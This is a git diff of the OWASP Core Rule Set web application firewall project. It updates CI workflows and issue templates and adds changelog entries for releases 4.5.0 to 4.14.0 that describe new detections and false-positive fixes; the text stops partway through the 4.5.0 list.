diff --git a/.editorconfig b/.editorconfig
index 037ae5e38..42cf352b8 100644
--- a/.editorconfig
+++ b/.editorconfig
@@ -21,4 +21,3 @@ indent_size = 4
 [tests/regression/tests/**/*.yaml]
 indent_style = space
 indent_size = 2
-
diff --git a/.github/ISSUE_TEMPLATE/04_feature.md b/.github/ISSUE_TEMPLATE/04_feature.md
index 04939383a..00aa211d9 100644
--- a/.github/ISSUE_TEMPLATE/04_feature.md
+++ b/.github/ISSUE_TEMPLATE/04_feature.md
@@ -5,7 +5,7 @@ title: ''
 labels: ':+1: Feature Request'
 assignees: ''
 ---
-<!-- 
+<!--
 For help and support please go here:
 - https://security.stackexchange.com/questions/tagged/owasp-crs
 
diff --git a/.github/ISSUE_TEMPLATE/06_meeting-agenda.md b/.github/ISSUE_TEMPLATE/06_meeting-agenda.md
new file mode 100644
index 000000000..ea3981345
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/06_meeting-agenda.md
@@ -0,0 +1,66 @@
+---
+name: 'Meeting Agenda'
+about: OWASP CRS Monthly Chat Agenda
+title: ''
+labels: ':bookmark: Meeting Agenda'
+assignees: ''
+---
+
+## What happened in the meantime since the chat last month
+
+### Outside Development
+
+* FIXME: Please fill in
+
+### Inside Development
+
+#### Rules
+
+* FIXME: Please fill in
+
+#### CRS Sandbox
+
+* FIXME: Please fill in
+
+#### Security
+
+* FIXME: Please fill in
+
+#### Plugins
+
+* FIXME: Please fill in
+
+#### Documentation and Public Relations
+
+* FIXME: Please fill in
+
+#### Project Administration and Sponsor relationships
+
+* FIXME: Please fill in
+
+#### Tools
+
+* FIXME: Please fill in
+
+#### Containers
+
+* FIXME: Please fill in
+
+
+## Rules development, key project numbers
+
+### PRs that have been merged since the last meeting
+
+* FIXME: Please fill in
+
+## Open PRs
+
+### Open PRs marked *DRAFT* or *work in progress* or *needs action*
+
+* FIXME: Please fill in
+
+## How to get to our slack and join the meeting?
+
+If you are not yet on the OWASP Slack, here is your invite: https://owasp.org/slack/invite .
+
+Everybody is welcome to join our community chat.
diff --git a/.github/ISSUE_TEMPLATE/new_issue.yaml b/.github/ISSUE_TEMPLATE/new_issue.yaml
new file mode 100644
index 000000000..ae02ee73e
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/new_issue.yaml
@@ -0,0 +1,67 @@
+name: New Issue
+description: Report something that doesn't fit in any other category
+labels:
+  - ":question: question"
+body:
+  - type: markdown
+    attributes:
+      value: |
+        Please do not open issues for help and support running Coraza, ModSecurity or the OWASP CRS. Instead, use one of the following channels to reach our project:
+          * https://security.stackexchange.com/questions/tagged/owasp-crs
+          * https://x.com/coreruleset
+          * https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project
+          * https://owasp.org/slack/invite (-> Channel #coreruleset)
+  - type: textarea
+    id: description
+    attributes:
+      label: Description
+      description: We want to be able to understand and to reproduce your problem. Please describe it here in detail. It is safest if you assume we know nothing about your service or software.
+      placeholder: Provide a detailed description of the issue
+    validations:
+      required: true
+  - type: textarea
+    id: reproduce
+    attributes:
+      label: How to reproduce the misbehavior (-> curl call)
+      description: |
+        It is easiest for us, if you submit a curl request that triggers your problem. If you can not do this, then please skip this section but be sure to fill out the next one in detail.
+
+        Please test your curl call against the CRS Sandbox before submitting.
+        https://coreruleset.org/docs/development/sandbox/
+      placeholder: Provide the curl call
+      render: bash
+  - type: textarea
+    id: logs
+    attributes:
+      label: Logs
+      description: |
+        Feel free to skip this section if you provided a curl call above.
+
+        Ideally, you provide a full audit log of the request, relevant infos out of the error log or at least a screenshot where we can see the payload so we can reproduce the behavior.
+
+        Usually, you find the logs at a location like /var/log/modsec_audit.log. When using a CDN or cloud server, the naming of the logs and their location depends on the provider. Please refer to their documentation.
+
+        If you cannot submit neither a curl call nor log files nor a payload to reproduce the behavior, then there is literally nothing we can do for you. Please help us by providing the information we need to help you.
+      placeholder: Provide the logs or relevant information
+  - type: textarea
+    id: environment
+    attributes:
+      label: Your Environment
+      description: Please provide all relevant information about your environment.
+      placeholder: |
+        * CRS version (e.g., v3.3.4):
+        * Paranoia level setting (e.g. PL1):
+        * ModSecurity version (e.g., 2.9.6):
+        * Web Server and version or cloud provider / CDN (e.g., Apache httpd 2.4.54):
+        * Operating System and version:
+    validations:
+      required: true
+  - type: checkboxes
+    id: confirmation
+    attributes:
+      label: Confirmation
+      description: |
+        Please confirm the following:
+      options:
+        - label: I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted.
+          required: true
diff --git a/.github/release.yml b/.github/release.yml
index c2c0535ae..18c9bb59e 100644
--- a/.github/release.yml
+++ b/.github/release.yml
@@ -7,23 +7,22 @@ changelog:
       - release:ignore
     authors:
       - octocat
-      - changelog-pr-bot
   categories:
     - title: ⭐ Important changes
       labels:
         - release:important
     - title: Breaking Changes 🛠
       labels:
-        - Semver-Major
         - breaking-change
         - release:breaking
     - title: 🆕 New features and detections 🎉
       labels:
-        - Semver-Minor
         - enhancement
         - release:new-detection
         - release:new-feature
+    - title: 🪦 Rule removals
+      labels:
+        - release:remove-rules
     - title: 🧰 Other Changes
       labels:
         - "*"
-
diff --git a/.github/workflows/lint.yaml b/.github/workflows/lint.yaml
index 285712271..f72008ebf 100644
--- a/.github/workflows/lint.yaml
+++ b/.github/workflows/lint.yaml
@@ -1,11 +1,23 @@
 name: Lint
 
-on: [push, pull_request, merge_group]
+on:
+  push:
+    branches:
+      - main
+      - v3.3/dev
+      - v3.3/master
+  pull_request:
+    branches:
+      - main
+      - v3.3/dev
+      - v3.3/master
+  merge_group:
 
 # Pin versions to not disrupt test pipelines
 env:
-  CRS_TOOLCHAIN_VERSION: '2.1.0'
-  SECRULES_PARSING_VERSION: '0.2.9'
+  CRS_TOOLCHAIN_VERSION: '2.3.4'
+  SECRULES_PARSING_VERSION: '0.2.11'
+  CRS_LINTER_VERSION: '0.1.2'
 
 jobs:
   check-syntax:
@@ -24,18 +36,16 @@ jobs:
           file_or_dir: tests/regression/tests
           config_file: .yamllint.yml
 
-      - name: Linelint
-        uses: fernandrone/linelint@7907a5dca0c28ea7dd05c6d8d8cacded713aca11 # v0.0.6
-        id: linelint
-
       - name: Set up Python 3
         uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v5.0.0
         with:
-          python-version: 3.7
+          python-version: 3.x
+
+      - uses: pre-commit/action@2c7b3805fd2a0fd8c1884dcaebf91fc102a13ecd # v3.0.1
 
       - name: "Check CRS syntax"
         run: |
-          pip install --upgrade setuptools
+          pip install -U setuptools
           pip install secrules-parsing==${{ env.SECRULES_PARSING_VERSION }}
           secrules-parser -c --output-type github -f rules/*.conf
 
@@ -43,17 +53,55 @@ jobs:
         run: |
           git remote add upstream https://github.com/coreruleset/coreruleset
           git fetch --tags upstream
-
+          git fetch upstream main
+          echo ${{ github.base_ref }}
+          if [ -n "${{ github.base_ref }}" ]; then
+            git fetch upstream "${{ github.base_ref }}"
+          fi
 
       - name: "Check CRS formatting"
         run: |
-          pip install --upgrade setuptools
-          pip install -r ./util/crs-rules-check/requirements.txt
-          ./util/crs-rules-check/rules-check.py --output=github -r crs-setup.conf.example -r rules/*.conf -t util/APPROVED_TAGS
+          pip install -U setuptools
+          pip install crs-linter==${{ env.CRS_LINTER_VERSION }}
+          # Use the target branch to look up the latest tag, e.g., `v3.3/master`, fall back
+          # to main branch.
+          # The version is either a tag, if the current commit is tagged, or a string of the form
+          # v<major>.<minor>.<patch>-<nr of commits>-g<hash>.
+          # In the former case we simply use that as the version, in the latter we construct
+          # v<major>.<minor + 1>.<patch>-dev.
+          if [ -z "${{ github.base_ref }}" ]; then
+            # e.g., force push
+            version="$(git describe --tags --match "v*.*.*")"
+          else
+            version="$(git describe --tags --match "v*.*.*" "upstream/${{ github.base_ref }}")"
+          fi
+          version="$(cut -dv -f2 <<<"${version}")"
+          echo "Detected version ${version}"
+          if grep -q -- "-g" <<<"${version}"; then
+            prefix="$(cut -d. -f1 <<<"${version}")"
+            minor="$(cut -d. -f2 <<<"${version}")"
+            suffix="$(cut -d. -f3 <<<"${version}")"
+            version="${prefix}.$((minor + 1)).${suffix}"
+            release_ref="${{ github.head_ref }}"
+            if [[ "${release_ref}" =~ ^release/v ]]
+            then
+              version="${release_ref/release\/v/}"
+            else
+              version="${version/-*-g*/}-dev"
+            fi
+          fi
+          echo "Required version for check: ${version}"
+          crs-linter \
+            --output=github \
+            -r crs-setup.conf.example \
+            -r 'rules/*.conf' \
+            -t util/APPROVED_TAGS \
+            -f util/FILENAME_EXCLUSIONS \
+            -v "${version}"
 
       - name: "Find rules without test"
         run: |
-          pip install --upgrade setuptools
+          pip install -U setuptools
           pip install -r ./util/find-rules-without-test/requirements.txt
           ./util/find-rules-without-test/find-rules-without-test.py --output=github .
 
diff --git a/.github/workflows/nightly.yml b/.github/workflows/nightly.yml
deleted file mode 100644
index 8640bff7e..000000000
--- a/.github/workflows/nightly.yml
+++ /dev/null
@@ -1,73 +0,0 @@
-
-name: Nightly Release
-on:
-  schedule:
-    - cron: '0 2 * * *' # run at 2 AM UTC
-
-jobs:
-  nightly:
-    name: Nightly Release
-    runs-on: ubuntu-latest
-    steps:
-      - name: Check GH API rate limits
-        run: |
-          gh api -i repos/coreruleset/coreruleset/releases/latest | grep -i "x-ratelimit"
-        env:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-
-      - name: "Checkout repo"
-        uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.2
-
-      - name: Delete previous nightly release
-        run: |
-          gh release delete --repo coreruleset/coreruleset --cleanup-tag --yes nightly
-        env:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-
-      - name: Create nightly release
-        run: |
-          notes=$(cat <<"EOF"
-          Nightly releases are snapshots of the development activity on the Core Rule Set project that may include new features and bug fixes scheduled for upcoming releases. These releases are made available to make it easier for users to test their existing configurations against the Core Rule Set code base for potential issues or to experiment with new features, with a chance to provide feedback on ways to improve the changes before being released.
-
-          As these releases are snapshots of the latest code, you may encounter an issue compared to the latest stable release so users are encouraged to run nightly releases in a non production environment. If you encounter an issue, please check our issue tracker to see if the issue has already been reported; if a report hasn't been made, please report it so we can review the issue and make any needed fixes.
-          EOF
-          )
-
-          gh release create \
-            --repo coreruleset/coreruleset \
-            --latest \
-            --prerelease \
-            --draft=false \
-            --title "Latest Nightly" \
-            --notes "${notes}" \
-            nightly
-        env:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-
-      - name: Publish draft if necessary
-        run: |
-          echo "A race condition in the GH API can cause a release published for a previously existing tag to be published as draft."
-          echo "Wait for 30 seconds for the API to catch up to the actual state, then check that the release has been properly published."
-          echo "If the release is still a draft, publish it."
-          sleep 30
-          if gh release list --repo coreruleset/coreruleset --exclude-drafts | grep --quiet nightly; then
-            echo "Nightly release was created properly"
-            exit 0
-          fi
-
-          echo "Nightly release was created as draft. Publishing now."
-
-          gh release edit \
-            --repo coreruleset/coreruleset \
-            --latest \
-            --prerelease \
-            --draft=false \
-            nightly
-        env:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-
-      - name: Check GH API rate limits
-        run: |
-          gh api -i repos/coreruleset/coreruleset/releases/latest | grep -i "x-ratelimit"
-        env:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/.github/workflows/quantitative.yaml b/.github/workflows/quantitative.yaml
new file mode 100644
index 000000000..1d3e082e3
--- /dev/null
+++ b/.github/workflows/quantitative.yaml
@@ -0,0 +1,95 @@
+name: Quantitative tests
+
+on:
+  pull_request_target:
+    branches:
+      - main
+    paths:
+      - 'rules/**'
+      - '.github/workflows/quantitative.yaml'
+  merge_group:
+
+# Pin tool versions to prevent problems
+env:
+  GO_FTW_VERSION: '1.3.0'
+
+permissions: {}
+jobs:
+  regression:
+    runs-on: ubuntu-latest
+    strategy:
+      matrix:
+        language: ["eng"]
+        year: ["2023"]
+        size: ["10K"]
+        paranoia_level: ["1"]
+    permissions:
+      pull-requests: write
+    steps:
+      - name: "Checkout repo"
+        uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.2
+
+      - name: "Checkout main repo"
+        uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.2
+        with:
+          repository: coreruleset/coreruleset
+          ref: 'main'
+          path: 'mainBranchFolder'
+      - name: "Install dependencies"
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          gh release download -R coreruleset/go-ftw "v${{ env.GO_FTW_VERSION }}" \
+            -p "ftw_${{ env.GO_FTW_VERSION }}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw
+      - name: "Restore Cache"
+        uses: actions/cache/restore@v4
+        with:
+          path: ~/.ftw/*.txt
+          key: ${{ matrix.language }}_news_${{ matrix.year }}_${{ matrix.size }}-sentences.txt
+
+      - name: "Run tests for language: ${{ matrix.language }}, year: ${{ matrix.year}}, size: ${{ matrix.size }}, paranoia level: ${{ matrix.paranoia_level }}"
+        id: quantitative
+        run: |
+          ./ftw quantitative \
+            -L ${{ matrix.language }} \
+            -y ${{ matrix.year }} \
+            -s ${{ matrix.size }} \
+            -P ${{ matrix.paranoia_level }} \
+            -o json -f new_results.json
+          ./ftw quantitative \
+            -C ./mainBranchFolder \
+            -L ${{ matrix.language }} \
+            -y ${{ matrix.year }} \
+            -s ${{ matrix.size }} \
+            -P ${{ matrix.paranoia_level }} \
+            -o json -f old_results.json
+          echo -e "\n📊 New Results"
+          cat new_results.json | jq .
+          echo -e "\n📊 Old Results"
+          cat old_results.json | jq .
+
+          OLD_FALSE_POSITIVES=$(jq -r '.falsePositives' old_results.json)
+          NEW_FALSE_POSITIVES=$(jq -r '.falsePositives' new_results.json)
+
+          echo -e "\n📊 Quantitative test results for language: \`${{ matrix.language }}\`, year: \`${{ matrix.year}}\`, size: \`${{ matrix.size }}\`, paranoia level: \`${{ matrix.paranoia_level }}\`:" > pr_comment.md
+          if [ "$NEW_FALSE_POSITIVES" -gt "$OLD_FALSE_POSITIVES" ]; then
+            echo -e " ⚠️ Quantitative testing detected new false positives" >> pr_comment.md
+            echo -e "📝 Total false positives: \`$OLD_FALSE_POSITIVES\` -> \`$NEW_FALSE_POSITIVES\`\n<details>\n" >> pr_comment.md
+            echo -e "" >> pr_comment.md
+            echo -e "  <summary>Diff details</summary>\n\n\`\`\`\n" >> pr_comment.md
+            diff <(jq . old_results.json) <(jq . new_results.json) >> pr_comment.md || true
+            echo -e "\n\`\`\`\n</details>" >> pr_comment.md
+          else
+            echo -e " 🚀 Quantitative testing did not detect new false positives" >> pr_comment.md
+          fi
+
+      - name: "Cache Corpus file"
+        uses: actions/cache@v4
+        with:
+          path: ~/.ftw/*.txt
+          key: ${{ matrix.language }}_news_${{ matrix.year }}_${{ matrix.size }}-sentences.txt
+      - name: "Comment PR"
+        uses: thollander/actions-comment-pull-request@v3
+        with:
+          comment-tag: execution
+          file-path: pr_comment.md
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 9fbb13269..022be33a4 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -2,11 +2,19 @@ name: Regression Tests
 
 on:
   push:
+    branches:
+      - main
+      - v3.3/dev
+      - v3.3/master
     paths:
       - 'rules/**'
       - 'tests/**'
       - '.github/**'
   pull_request:
+    branches:
+      - main
+      - v3.3/dev
+      - v3.3/master
     paths:
       - 'rules/**'
       - 'tests/**'
@@ -16,14 +24,15 @@ on:
 
 # Pin tool versions to prevent problems
 env:
-  GO_FTW_VERSION: '1.0.3'
+  GO_FTW_VERSION: '1.3.0'
 
 jobs:
   regression:
     runs-on: ubuntu-latest
     strategy:
+      fail-fast: false
       matrix:
-        modsec_version: [modsec2-apache]
+        modsec_version: [modsec2-apache, modsec3-nginx]
     steps:
       - name: "Checkout repo"
         uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.2
@@ -39,6 +48,9 @@ jobs:
         run: |
           mkdir -p "tests/logs/${{ matrix.modsec_version }}/{nginx,apache2}"
           docker compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}"
+          echo "Waiting for container to become ready"
+          curl --retry 5 --retry-connrefused --retry-delay 2 localhost || true
+          sleep 5
           docker compose -f ./tests/docker-compose.yml logs
           if ! [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ]; then
             echo "Web server failed to start. Aborting."
@@ -49,7 +61,7 @@ jobs:
           ./ftw run \
             -d tests/regression/tests \
             --log-file "tests/logs/${{ matrix.modsec_version }}/error.log" \
-            --overrides tests/regression/httpd-overrides.yaml \
+            --overrides tests/regression/${{ matrix.modsec_version == 'modsec2-apache' && 'httpd' || 'nginx' }}-overrides.yaml \
             --show-failures-only
 
       - name: "Change permissions of artifacts for upload"
@@ -61,7 +73,7 @@ jobs:
       - uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
         if: failure()
         with:
-          name: waf-logs
+          name: waf-logs-${{ matrix.modsec_version }}
           path: tests/logs/${{ matrix.modsec_version }}
 
       - name: Clean docker-compose
diff --git a/.gitignore b/.gitignore
index dabe18fda..1c073edd8 100644
--- a/.gitignore
+++ b/.gitignore
@@ -11,7 +11,7 @@ rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf
 util/geo-location/GeoIP.dat
 
 # PHP functions frequency list generated and updated by running
-# util/php-dictionary-gen.sh 
+# util/php-dictionary-gen.sh
 util/php-dictionary-gen/frequencylist.txt
 
 # Unit test caches
diff --git a/CHANGES.md b/CHANGES.md
index 3c88ae2e9..cf3e9b357 100644
--- a/CHANGES.md
+++ b/CHANGES.md
@@ -5,8 +5,201 @@
   or the CRS Google Group at
 * https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project
 
-## Nightly builds
-New changelog entries are written to `.changes-pending.md`. They will be moved to the main changelog before a release.
+## Version 4.14.0 - 2025-04-29
+
+## What's Changed
+### 🆕 New features and detections 🎉
+* feat: detect ASP web shells by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4063
+* feat: detect compressed database dumps by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4082
+* feat: detect javascript methods import fetch console.log `console.dir` by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4076
+### 🧰 Other Changes
+* fix: fixing FPs related to rule 951220 by @azurit in https://github.com/coreruleset/coreruleset/pull/4079
+* fix: don't block ttf font files by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4081
+* fix: 932270 FP by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3917
+* fix(954100): detect forward slash in path by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4094
+* fix: remove `.application` from restricted extensions by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4103
+* fix: 44J-250329 by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4107
+
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.13.0...v.4.14.0
+
+## Version 4.13.0 - 2025-03-31
+
+## What's Changed
+### ⭐ Important changes
+* fix(security): fixing double URL decode of REQUEST_URI by @azurit in https://github.com/coreruleset/coreruleset/pull/4047
+### 🆕 New features and detections 🎉
+* feat: block header related to CVE-2025-29927 (Next.js) by @azurit in https://github.com/coreruleset/coreruleset/pull/4053
+* feat: added new XSS payloads by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4055
+* feat: add potential malicious file extensions into tx.restricted_extensions by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4068
+* feat: add additional files commonly accessed by bots by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4069
+### 🪦 Rule removals
+* feat: remove rule 952100 for detecting Java Source Code Leakage by @S0obi in https://github.com/coreruleset/coreruleset/pull/4052
+### 🧰 Other Changes
+* fix(934130): extend prototype pollution payload by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4036
+* fix: rule 930110 is not supposed to match bare '..' without (back)slashes by @azurit in https://github.com/coreruleset/coreruleset/pull/4050
+* fix: use boundary to fix false positive with email `firstname.dockery@host.tld` by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4045
+* feat: refresh restricted-upload.data by @S0obi in https://github.com/coreruleset/coreruleset/pull/4046
+* fix: tag inconsistency per file by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4031
+* feat: adding .dist and .dpkg-dist into tx.restricted_extensions by @azurit in https://github.com/coreruleset/coreruleset/pull/4057
+* feat: add more default session cookie names by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4062
+* fix: added pre-check of unset TX variable by @airween in https://github.com/coreruleset/coreruleset/pull/4066
+* fix: false positive found in quantitative testing round 2 for unix rce rules (932230 PL-1, 932235 PL-1, 932250 PL-1, 932260 PL-1, 932231 PL-2, 932220 PL-2, 932236 PL-2, 932239 PL-2, 932232 PL-3, 932238 PL-3) by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4019
+
+## New Contributors
+* @daum3ns made their first contribution in https://github.com/coreruleset/coreruleset/pull/4043
+* @S0obi made their first contribution in https://github.com/coreruleset/coreruleset/pull/4046
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.12.0...v4.13.0
+
+## Version 4.12.0 - 2025-03-01
+
+## What's Changed
+### 🆕 New features and detections 🎉
+* feat: prevent V1 cookie format use by @fzipi in https://github.com/coreruleset/coreruleset/pull/4006
+* feat: added new restricted files for openstack and docker compose by @azurit in https://github.com/coreruleset/coreruleset/pull/4021
+### 🧰 Other Changes
+* fix: multipart header tag consistency by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3992
+* fix: prevent invalid commands matches on 5 characters or less (932220 PL-2, 932230 PL-1, 932232 PL-3, 932235 PL-1, 932236 PL-2, 932237 PL-3, 932238 PL-3, 932239 PL-2, 932250 PL-1, 932260 PL-1) by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/3735
+* docs: add warning about default charsets modification by @fzipi in https://github.com/coreruleset/coreruleset/pull/4003
+* fix: response splitting rules and tests by @theseion in https://github.com/coreruleset/coreruleset/pull/4009
+* fix(933160): use better regex by @fzipi in https://github.com/coreruleset/coreruleset/pull/4010
+* fix: move fopen to 933160 to resolve fp with `RootAndLeafOpenCamera.jpg` (933150 PL-1, 933160 PL-1) by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4016
+* fix(941210): update log message to reflect rule javascript word detection by @fzipi in https://github.com/coreruleset/coreruleset/pull/4023
+* fix: remove .env from lfi-os-files.data by @theseion in https://github.com/coreruleset/coreruleset/pull/4024
+
+## New Contributors
+* @renovate made their first contribution in https://github.com/coreruleset/coreruleset/pull/4000
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.11.0...v4.12.0
+
+## Version 4.11.0 - 2025-01-27
+
+## What's Changed
+### 🪦 Rule removals
+* feat: Remove rules for lack of viable attack scenario (920220 PL1, 920221 PL1) by @dune73 in https://github.com/coreruleset/coreruleset/pull/3969
+### 🧰 Other Changes
+* fix: remove aliases man, mi, si and resolve positives (932125 PL1) by @franbuehler in https://github.com/coreruleset/coreruleset/pull/3971
+* fix: remove where, if, for and vol and resolve false positives (932380 PL1) by @franbuehler in https://github.com/coreruleset/coreruleset/pull/3972
+* fix: make 932300 actually case-insensitive by @theseion in https://github.com/coreruleset/coreruleset/pull/3977
+* fix: remove sql function names to resolve false positives (942151 PL1) by @franbuehler in https://github.com/coreruleset/coreruleset/pull/3973
+* fix: issue 3809 by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3983
+
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.10.0...v4.11.0
+
+## Version 4.10.0 - 2024-12-29
+
+## What's Changed
+### 🆕 New features and detections 🎉
+* feat: block CVE-2023-5003 by @azurit in https://github.com/coreruleset/coreruleset/pull/3955
+* feat: prevent accessing PHP variables by @azurit in https://github.com/coreruleset/coreruleset/pull/3965
+### 🧰 Other Changes
+* fix: FP against `pattern` with `=` following at arbitrary position by @theseion in https://github.com/coreruleset/coreruleset/pull/3963
+
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.9.0...v4.10.0
+
+## Version 4.9.0 - 2024-11-29
+
+## What's Changed
+### ⭐ Important changes
+* feat: add variable to skip response rules by @fzipi in https://github.com/coreruleset/coreruleset/pull/3944
+### 🆕 New features and detections 🎉
+* feat: add fish shell files to restricted-files.data by @OhMyVolk in https://github.com/coreruleset/coreruleset/pull/3915
+* feat: add quantitative testing to Git workflow by @airween in https://github.com/coreruleset/coreruleset/pull/3924
+### 🧰 Other Changes
+* feat: added support for new web shells by @azurit in https://github.com/coreruleset/coreruleset/pull/3898
+* fix(security): remove double URL decode (921151 PL2, 932190 PL3, 942441 PL2, 942442 PL2, 942460 PL3) by @azurit in https://github.com/coreruleset/coreruleset/pull/3741
+* docs: extended rule documentation (900200) by @dune73 in https://github.com/coreruleset/coreruleset/pull/3934
+
+## New Contributors
+* @OhMyVolk made their first contribution in https://github.com/coreruleset/coreruleset/pull/3915
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.8.0...v4.9.0
+
+## Version 4.8.0 - 2024-10-28
+
+## What's Changed
+### ⭐ Important changes
+* fix: 9EA-241022 v4 by @RedXanadu in https://github.com/coreruleset/coreruleset/pull/3905
+### 🆕 New features and detections 🎉
+* chore: set up nginx tests by @theseion in https://github.com/coreruleset/coreruleset/pull/3856
+### 🧰 Other Changes
+* fix: remove unnecessary capture groups by @TimDiam0nd in https://github.com/coreruleset/coreruleset/pull/3849
+* fix(942120): update operators by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3841
+* fix(933120): do not match on base64 encoded strings by @fzipi in https://github.com/coreruleset/coreruleset/pull/3863
+* fix(refactor): 942130 and 942131 regex-assembly by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3862
+* fix(942520):  SQL operators can be one or more characters by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3845
+* chore: remove verify id-range by @fzipi in https://github.com/coreruleset/coreruleset/pull/3885
+* chore: remove find-max-datalen-in-tests by @fzipi in https://github.com/coreruleset/coreruleset/pull/3891
+* chore: remove honeypot sensor by @fzipi in https://github.com/coreruleset/coreruleset/pull/3883
+* chore: remove browser tools by @fzipi in https://github.com/coreruleset/coreruleset/pull/3887
+* chore: remove send-payload-pls by @fzipi in https://github.com/coreruleset/coreruleset/pull/3879
+* chore: remove geo-location by @fzipi in https://github.com/coreruleset/coreruleset/pull/3875
+* chore: remove crs2 renumbering by @fzipi in https://github.com/coreruleset/coreruleset/pull/3873
+* chore: remove change-version script by @fzipi in https://github.com/coreruleset/coreruleset/pull/3869
+* chore: remove join multiline rules by @fzipi in https://github.com/coreruleset/coreruleset/pull/3877
+* chore: remove av-scanning by @fzipi in https://github.com/coreruleset/coreruleset/pull/3871
+* chore: remove util virtual patching by @fzipi in https://github.com/coreruleset/coreruleset/pull/3889
+* chore: remove fp-finder by @fzipi in https://github.com/coreruleset/coreruleset/pull/3893
+
+## New Contributors
+* @evidencebp made their first contribution in https://github.com/coreruleset/coreruleset/pull/3837
+* @mtaket made their first contribution in https://github.com/coreruleset/coreruleset/pull/3855
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.7.0...v4.8.0
+
+## Version 4.7.0 - 2024-09-23
+
+### 🆕 New features and detections 🎉
+* feat: added sendgrid.env into restricted files by @azurit in https://github.com/coreruleset/coreruleset/pull/3823
+### 🧰 Other Changes
+* fix: Changed regex (920470) to match multiple whitespaces after `Content-Type` parameters to avoid false-positives by @lostmann-owl-it in https://github.com/coreruleset/coreruleset/pull/3818
+* fix: fp with user-agent containing ; pg (932239 PL2) by @franbuehler in https://github.com/coreruleset/coreruleset/pull/3727
+* fix: update xss detection with onwebkitplaybacktargetavailabilitychanged event by @fzipi in https://github.com/coreruleset/coreruleset/pull/3822
+* feat: refactoring (944110 PL1) by @azurit in https://github.com/coreruleset/coreruleset/pull/3715
+
+## New Contributors
+* @lostmann-owl-it made their first contribution in https://github.com/coreruleset/coreruleset/pull/3818
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.6.0...v4.7.0
+
+## Version 4.6.0 - 2024-08-27
+
+### ⭐ Important changes
+* fix: prevent using backslash in file names by @fzipi in https://github.com/coreruleset/coreruleset/pull/3799
+* feat: add new rule to catch invalid character in multipart headers by @airween, @theseion, @fzipi in https://github.com/coreruleset/coreruleset/pull/3796
+
+Big thanks tu @luelueking for reporting us these two ☝️ .
+
+### 🧰 Other Changes
+* feat: rule to detect bash tilde expansion by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3765
+* fix: Update 932270's `ver` by @airween in https://github.com/coreruleset/coreruleset/pull/3786
+* perf: remove unnecessary chain rule and capture (921180 PL3) by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/3787
+* fix: add pem to restricted file extensions by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/3789
+* fix(942160): check REQUEST_FILENAME by @mat1010 in https://github.com/coreruleset/coreruleset/pull/3782
+
+## New Contributors
+* @mat1010 made their first contribution in https://github.com/coreruleset/coreruleset/pull/3782
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.5.0...v4.6.0
+
+## Version 4.5.0 - 2024-07-23
+
+### 🆕 New features and detections 🎉
+* feat: added arithmetic expansion payload by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3756
+### 🧰 Other Changes
+* fix(security): alias false negative by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/3740
+* feat: add test overrides for nginx by @theseion in https://github.com/coreruleset/coreruleset/pull/3369
